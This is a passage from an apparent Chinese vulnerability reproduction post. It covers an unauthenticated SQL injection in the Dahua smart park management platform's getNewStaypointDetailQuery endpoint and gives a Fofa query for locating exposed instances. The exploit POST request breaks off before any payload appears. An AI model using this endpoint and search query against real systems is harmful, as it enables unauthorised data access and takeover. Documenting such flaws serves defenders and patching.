简介
大华智慧园区解决方案通过AI技术的加载实现园区安防与园区办公应用的智慧化升级,提升企业安全等级和办公效率;将物联网应用神经延伸至企业各种业务场景,实现人、车、物数据信息线上融合与计算,为园区智慧化管理提供数据源;构建园区大数据平台,向下汇聚各类业务子系统数据,向上为企业业务提供数据支撑,实现企业“数据全融合、状态全可视、业务全可管、事件全可控”。从而助力企业数字化转型,实现安全等级提升、工作效率提升、管理成本下降。
漏洞简介
大华智慧园区综合管理平台getNewStaypointDetailQuery接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
影响范围
大华智慧园区综合管理平台
Fofa:
app="dahua-智慧园区综合管理平台"
漏洞复现
POST /portal/services/carQuery/getNewStaypointDetailQuery HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/